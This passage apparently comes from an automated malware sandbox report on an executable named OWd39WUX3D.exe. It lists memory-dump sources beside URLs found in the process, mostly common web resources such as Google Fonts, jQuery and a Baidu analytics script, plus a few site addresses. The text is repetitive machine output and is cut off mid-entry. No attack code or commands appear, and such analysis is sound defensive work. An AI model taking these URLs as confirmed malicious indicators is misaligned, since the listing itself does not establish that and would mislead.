00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cookiedatabase.org/tcf/purposes/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dunsregistered.dnb.com
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601023939.0000000004010000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Abril
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Heebo%3A400%2C400i%2C700%2C700i%7CIBM
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&subset=la
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ropa
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601023939.0000000004010000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
              Source: OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608371326.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500449748.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.494638787.0000000007830000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
              Source: OWd39WUX3D.exe, 00000000.00000003.393036603.0000000006B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hkoptlens.com/en/news
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?520556228c0113270c0c772027905838
              Source: OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, 